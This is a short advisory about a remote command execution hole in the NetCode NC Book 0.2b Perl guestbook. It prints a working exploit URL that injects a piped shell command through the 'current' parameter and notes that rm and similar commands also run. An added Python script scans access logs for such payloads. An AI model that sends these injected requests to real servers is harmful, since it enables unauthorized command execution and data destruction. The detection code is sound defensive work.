
NetCode NC Book 0.2b remote command execution

    NC Book


    NetCode NC Book 0.2b


    'digitalseed' posted the following.  A pretty big hole in the main
    script of that guestbook leads to command execution on the remote
    server running this vulnerable Perl script.  Exploit:

        http://target/cgi-bin/ncbook/book.cgi?action=default&current=|ls -la/|&form_tid=996604045&prev=main.html&list_message_index=10

    The above line, if given, will output the file contents of the
    kernel dir.  You can also execute any commands (ls, cat, rm, etc.).
    Original discovery: digitalseed and ksenor.


    Nothing yet.
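
    With no fix available, one way to spot this request pattern in web server access logs is shown below. This is an added example, not part of the original advisory or of NC Book. The log lines are constructed, and the allowlist assumes a legitimate `current` value is a plain file name like the `main.html` seen in `prev`.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: a legitimate `current` value is a plain file name (e.g. main.html).
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# Request target inside a Common/Combined Log Format line; tolerant of raw spaces.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2001:10:00:00 +0000] "GET /cgi-bin/ncbook/book.cgi'
    '?action=default&current=main.html&form_tid=996604045 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Aug/2001:10:02:11 +0000] "GET /cgi-bin/ncbook/book.cgi'
    '?action=default&current=%7Cls%20-la/%7C&form_tid=996604045 HTTP/1.0" 200 901',
    '203.0.113.5 - - [01/Aug/2001:10:03:40 +0000] "GET /cgi-bin/ncbook/book.cgi'
    '?action=default&current=%257Cls%2520-la/%257C HTTP/1.0" 200 88',
    '192.0.2.44 - - [01/Aug/2001:10:05:02 +0000] "GET /cgi-bin/search.cgi'
    '?current=a%7Cb HTTP/1.0" 200 300',
]

def suspicious_requests(log_lines, script="book.cgi", param="current"):
    """Return (client_ip, decoded_value) for each non-allowlisted `param` value."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue  # only the guestbook script is of interest here
        for name, value in parse_qsl(url.query):
            if name != param:
                continue
            # parse_qsl decoded once; decode again so double-encoded
            # values (%257C) are reported in clear form.
            decoded = unquote(value)
            if not (SAFE_VALUE.fullmatch(value) and SAFE_VALUE.fullmatch(decoded)):
                hits.append((line.split()[0], decoded))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent current={value!r}")
```

    Matching against an allowlist rather than searching for `|` alone also flags other shell metacharacters in the same parameter.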
